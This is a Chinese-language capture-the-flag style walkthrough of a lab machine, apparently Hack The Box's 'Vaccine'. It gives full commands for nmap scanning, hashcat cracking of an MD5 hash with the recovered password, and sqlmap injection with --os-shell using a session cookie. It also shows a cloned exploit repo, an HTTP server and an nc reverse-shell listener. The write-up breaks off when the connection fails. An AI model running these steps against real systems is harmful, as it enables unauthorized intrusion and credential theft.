Don’t Forget To contemplate
(从上一台靶机开始就觉得一边做任务一边渗透的话步骤会有点乱,所以从这边开始选择先渗透再回答问题)
(经过两天的努力,还是解决不了网络的问题,这个坑先留着,以后再来填)
老样子,开扫
nmap -sV -Pn 10.129.43.51
靶机开放了21、22和80端口服务,先扫描一下FTP是否允许匿名登陆
FTP code为230,也就是允许匿名登陆,于是连接FTP,用户名为Anonymous,密码为空
登录后发现back.zip,下载下来
压缩包有密码,利用ARCHPR进行爆破,得到压缩包密码741852963
审计index.php,发现了网站的账号和密码的MD5值
利用hashcat对加密后的密码进行解密,得到密码:qwerty789
hashcat -m 0 -a 0 ‘2cb42f8734ea607eefed3b70af13bbd3’ rockyou.txt —force
到这边我们已经获取到了网站的用户名和密码,接下来就访问80端口进行登录
登陆后的网站存放了一些信息,东点点西点点,在搜索框输入后发现URL中多了参数?search=123
有足够的理由怀疑这是个SQL注入点,开始尝试注入
当search的值为-1’时,网页报错,有很大可能存在字符型注入
二话不说,掏出sqlmap直接开注
从刚刚的注入结果可以看出,靶机需要经过cookie认证,后台的数据库名为PostgreSQL,接下来尝试提权
python sqlmap.py -u “http://10.129.43.51/dashboard.php?search=-1‘“ —cookie PHPSESSID=28n4cav8n1b6sud5gfruf5rphg —batch —os-shell
不能直接用—os-shell提权,尝试别的方法
利用别人写好的脚本进行提权,修改Cookie、IP和端口号,然后打开http服务和监听端口,执行脚本
git clone https://github.com/florianges/-HTB-Vaccine_sql_injection
开启HTTP服务:python3 -m http.server 80
监听端口:nc -lvnp 4444
网络一直连不上,寄!